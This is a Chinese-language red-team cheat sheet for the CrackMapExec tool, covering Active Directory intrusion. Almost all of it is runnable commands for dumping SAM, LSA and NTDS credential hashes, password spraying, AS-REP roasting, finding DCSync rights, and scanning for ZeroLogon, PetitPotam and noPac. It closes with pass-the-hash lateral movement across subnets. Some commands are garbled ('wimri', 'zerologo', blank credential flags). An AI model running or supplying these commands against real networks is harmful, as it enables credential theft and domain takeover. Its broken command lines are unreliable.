红队专题-域渗透-CrackMapExec
CrackMapExec
- CrackMapExec CME
-
- winrm执行命令(躲避杀软)
- smb 协议常用枚举功能
- 获取凭证 dump hash
- 导出域ntds
- 密码喷洒
- 文件上传下载
- 检测主机上是否运行spooler、 webdav 服务
- 枚举域用户
- ASREPRoast
- 查找非约束委派账户
- 检测ESC8(adcs)漏洞利用 查看adcs服务器
- 通过活动目录收集子网段信息
- 查看具有DCsync权限用户
- 收集bloodhound 信息
- 通过RDP协议屏幕截图
- 扫描zerologo、petitpotam、nopac漏洞
- kali自带工具:crackmapexec
https://github.com/byt3bl33d3r/CrackMapExec
CrackMapExec CME
一款后渗透 内网域渗透的 利用工具
对域进行信息收集或者一些常见域漏洞的探测。
CrackMapExec提供了域环境(活动目录)渗透测试中一站式便携工具,
它具有列举登录用户、通过SMB(Server Message Block)网络文件共享协议爬虫列出SMB分享列表, 执行类似于Psexec的攻击
帮助自动化大型活动目录(AD)网络安全评估任务。
其缔造者@byt3bl33d3r称,该工具的生存概念是, 利用AD内置功能/协议达成其功能
winrm执行命令(躲避杀软)
crackmapexec wimri 192.168.216.144 -u 'administrator' -p 'pass1234!' -x 'whoami'
smb 协议常用枚举功能
crackmapexec smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --groups 枚举域组
crackmapexec smb 192.168.1.0/24 --gen-relay-list relaylistOutputFilename.txt 枚举不需要smb签名的主机
crackmapexec smb -u user -p pass -M enum_av 枚举主机上的杀软
crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!' --shares 列出共享
crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!' --sessions 枚举有效sessions
crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!' --disks 列出磁盘
crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!' --loggedon-users 枚举登录用户
crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!' --users 枚举域用户
crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!' --rid-brute 通过爆破RID枚举用户
crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!' --pass-pol 获取域密码策略
crackmapexec smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth 验证本地用户,并且测试登录
获取凭证 dump hash
获取到高权限的用户可以使用–sam ,–lsa dump hash
crackmapexec wimri 192.168.216.144 -u 'administrator' -p 'pass1234!' --sam/--lsa
导出域ntds
crackmapexec smb 192.168.216.144 -u 'administrator' -p 'pass1234!' --ntds
密码喷洒
使用crackmapexec爆破SMB 的用户和密码。
crackmapexec smb 172.22.8.0/24 -u 'Aldrich' -p 'Ald@rLMWuy7Z!#'
crackmapexec smb 192.168.1.101 -u user1 user2 user3 -p Summer18 多个用户,一个密码进行喷晒
crackmapexec smb 192.168.1.101 -u /path/to/users.txt -p Summer18 使用users.txt 用户列表文件指定多用户喷晒
crackmapexec smb 192.168.1.101 -u Administrator -p /path/to/passwords.txt 爆破administrator用户密码
文件上传下载
crackmapexec smb 172.16.251.152 -u user -p pass --put-file /tmp/whoami.txt \\Windows\\Temp\\whoami.txt 上传文件
crackmapexec smb 172.16.251.152 -u user -p pass --get-file \\Windows\\Temp\\whoami.txt /tmp/whoami.txt 下载文件
检测主机上是否运行spooler、 webdav 服务
crackmapexec smb -u 'user' -p 'pass' -M spooler 查看打印机服务
crackmapexec smb -u 'user' -p 'pass' -M webdav 查看webdav服务
枚举域用户
cme ldap 192.168.1.0/24 -u users.txt -p '' -k
ASREPRoast
没有已知域用户密码的情况下:
cme ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txt
在拥有域内用户权限的情况下
cme ldap 192.168.0.104 -u harry -p pass --asreproast output.txt
查找非约束委派账户
cme ldap 192.168.0.104 -u harry -p pass --trusted-for-delegation
检测ESC8(adcs)漏洞利用 查看adcs服务器
crackmapexec run ldap -u user -p pass -M adcs
通过活动目录收集子网段信息
crackmapexec ldap -u -p -M get-network
crackmapexec ldap -u -p -M get-network -o ONLY_HOSTS=true
crackmapexec ldap -u -p -M get-network -o ALL=true
查看具有DCsync权限用户
crackmapexec ldap lab-dc.lab.local -k --kdcHost lab-dc.lab.local -M daclread -o TARGET_DN="DC=lab,DC=LOCAL" ACTION=read RIGHTS=DCSync
收集bloodhound 信息
crackmapexec ldap -u user -p pass --bloodhound --ns ip --collection All
通过RDP协议屏幕截图
crackmapexec rdp -u -p --screenshot --screentime
扫描zerologo、petitpotam、nopac漏洞
crackmapexec smb -u '' -p '' -M zerologo
crackmapexec smb -u '' -p '' -M petitpotam
crackmapexec smb -u 'user' -p 'pass' -M nopac
利用smb协议:(445端口没限制)
crackmapexec smb 192.168.235.0/24 -u administrator -H hash.txt
winrm:
这个东西和上面的5985端口是同一个东西,不过crackmapexec集成了这个东西:
crackmapexec winrm 192.168.235.0/24 -u administrator -H hash.txt
PS:
还可以对特定ip进行批量横向,比如在实战中我把开放445端口主机的ip提取出来:
crackmapexec smb ip.txt -u administrator -H hash.txt
crackmapexec winrm ip.txt -u administrator -H hash.txt
还可以对ssh,mssql进行横向,非常好的一个工具。